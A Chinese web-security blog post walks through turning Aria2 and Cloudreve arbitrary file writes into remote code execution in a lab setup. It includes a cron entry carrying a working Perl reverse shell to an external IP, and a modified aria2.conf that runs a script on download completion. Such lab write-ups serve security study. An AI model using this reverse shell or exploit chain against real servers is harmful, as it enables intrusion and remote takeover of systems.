Aria2&Cloudreve&任意文件写入到RCE
Z3r4y 发表于 四川 WEB安全 990浏览 · 2024-09-20 07:42

Aria2&Cloudreve&任意文件写入到RCE

什么是Aria2

Aria2 是一个轻量级的命令行下载工具,支持多种下载协议,如 HTTP、FTP、SFTP、BitTorrentMetalink。它以其强大的多源下载能力而著称,可以同时从多个服务器或对等节点下载文件,加快下载速度。Aria2 占用资源少,适合在服务器或嵌入式系统上使用,常用于需要高效、稳定下载任务的场景。由于它是命令行工具,用户通常配合像 YAAW 这样的 Web 前端界面来简化操作。

Aria2命令行常见操作

Aria2 常见的操作主要通过命令行进行,以下是一些基础操作的简单介绍:

1.下载单个文件

aria2c https://example.com/file.zip

这会从指定的 URL 下载文件到当前目录。

2.从多个源下载文件:

aria2c https://example.com/file.zip ftp://example.org/file.zip

Aria2 会同时从多个源下载文件,加快速度。

3.使用 BitTorrent 协议下载:

aria2c file.torrent

或者使用磁力链接

aria2c 'magnet:?xt=urn:btih:xxxxxxxx'

4.断点续传:

aria2c -c https://example.com/file.zip

如果下载中断,可以用 -c 参数继续下载未完成的部分。

5.批量下载:将多个下载链接写入一个文件(如 downloads.txt),然后使用:

aria2c -i downloads.txt

Aria2 会自动依次下载文件。

6.限制下载速度:

aria2c --max-download-limit=500K https://example.com/file.zip

这样可以将下载速度限制为每秒 500KB。

Aria2-Web

Aria2 的 Web 前端通常通过 RPC 接口与后台的 Aria2 交互,因此 URL 主要用于与 Aria2 的 JSON-RPC 服务通信。具体的 URL 结构取决于你使用的 Web 前端和服务器配置。以下是 Aria2 和一些常见 Web 前端相关的 URL:

  1. Aria2 的 JSON-RPC URL

Aria2 默认通过以下 URL 提供 JSON-RPC 服务:

  • http://<host>:6800/jsonrpc

其中:

  • <host> 是 Aria2 运行的服务器的 IP 地址或域名,localhost 表示本地主机。
  • 6800 是默认的 RPC 端口,用户可以在配置文件中更改。

例如:

http://localhost:6800/jsonrpc

这就是 Web 前端用来向 Aria2 发送 RPC 请求的 URL。

  1. 常见 Aria2 Web 前端

一些常用的 Aria2 Web 前端,如 YAAW ,会有自己的前端 URL,用于通过浏览器访问和控制 Aria2。以下是它们的 URL 示例:

YAAW(Yet Another Aria2 Web Frontend)

YAAW 是一个简单的 Web 前端,通常放置在Web 服务器中,并通过以下 URL 访问:

  • http://<host>:<port>/yaaw/index.html

例如:

http://localhost:8080/yaaw/index.html

3.设置 RPC URL 的位置

在 Web 前端的设置中,通常需要手动配置 Aria2 的 JSON-RPC URL,确保它能正确连接到你的 Aria2 服务器。这个 URL 通常是:

  • http://<host>:6800/jsonrpc

通过此配置,Web 前端可以通过 JSON-RPC 接口与 Aria2 后台进行通信,执行下载任务的管理操作。

总结起来,Aria2 的 Web URL 主要分为两部分:Aria2 的 JSON-RPC 接口 URL(如 http://localhost:6800/jsonrpc),以及不同 Web 前端的访问 URL(如 YAAW 或 AriaNg 的前端页面)。

Aria2任意文件写入漏洞

参考这篇文章

https://paper.seebug.org/120/#abstract

可以写入ssh公钥再带着私钥连接

也可以写/etc/cron.d来计划任务RCE

用vulhub的aria2环境

https://github.com/thedogb/yaaw-docker

用yaaw来web交互

先设置靶机的json-rpc路径

再设置下载任务,填写恶意shell的url,受害主机shell文件的存储路径(/etc/cron.d)

恶意shell

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="124.222.136.33";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

成功反弹shell

集成 Aria2--Cloudreve漏洞

Cloudreve 通过 RPC 接口 将 Aria2 的下载管理功能集成。通过这种集成,Cloudreve 能够利用 Aria2 的强大下载能力,提供更快速和多样化的文件下载体验,特别是适用于离线下载和加速下载场景。

/root/backup.sh 是一个备份脚本,我们尝试利用 Cloudreve 拿到这个文件的编辑权限

下面是对如何拿到一个文件的编辑权限的说明:

我们前往管理面板,在存储策略这里点击专家模式修改

这样进行设置,再在文件中进行导入

可以看到能够在根目录看到我们的文件

可以直接进行修改

这样就可以任意修改文件,修改/usr/aria2/aria2.conf,指定下载完成时需要运行的恶意脚本

dir=/usr/aria2/data
disable-ipv6=true
enable-rpc=true
max-download-limit=0
max-upload-limit=0
rpc-allow-origin-all=true
rpc-listen-all=true
rpc-listen-port=6801
rpc-secure=false
seed-ratio=0
seed-time=0
on-bt-download-complete=/root/backup.sh
on-download-complete=/root/backup.sh

先随便离线下载,重新加载aria2.conf

最后再上传一个离线下载任务触发/root/backup.sh

成功反弹shell

0 条评论
某人
表情
可输入 255